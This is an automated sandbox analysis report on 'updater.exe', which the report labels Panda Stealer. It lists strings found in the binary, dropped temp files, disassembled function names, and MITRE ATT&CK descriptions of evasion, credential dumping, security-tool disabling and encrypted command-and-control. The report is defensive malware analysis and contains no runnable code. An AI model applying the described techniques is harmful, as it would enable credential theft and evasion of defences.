Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: WLDIDRPJXW.PRECQYBSH.1.dr	String found in binary or memory: https://www.google.com/favicon.ico

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report updater.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Panda Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\BBIJTRDCOTDWPKCIVKWE.PLNG

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\KVRIFTOPKR.WVDLGDUFD

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\PKOJNU.IFGHVJFFUC

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QJWTHWRHHQKILSENSBC.KRUUKLJBVDMGTCVO

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\WLDIDRPJXW.PRECQYBSH

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
updater.exe

Function 013C3507 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 360
libraryloaderCOMMON

Function 013CB653 Relevance: 27.2, Strings: 21, Instructions: 924
COMMON

Function 013D1BD6 Relevance: 25.7, Strings: 20, Instructions: 717
COMMON

Function 013D3095 Relevance: 22.1, Strings: 17, Instructions: 872
COMMON

Function 013DA518 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238
libraryloaderCOMMON

Function 013DB7C3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 155
windowCOMMON

Function 014061B5 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 266
COMMON

Function 013C7D35 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 400
COMMON

Function 013D2C33 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 221
libraryloaderCOMMON

Function 01406531 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123
fileCOMMON

Function 014344F6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Function 013CDDC0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 297
fileCOMMON

Function 0143C47C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 013CF68F Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 296
fileCOMMON

Function 013CD88B Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 324
fileCOMMON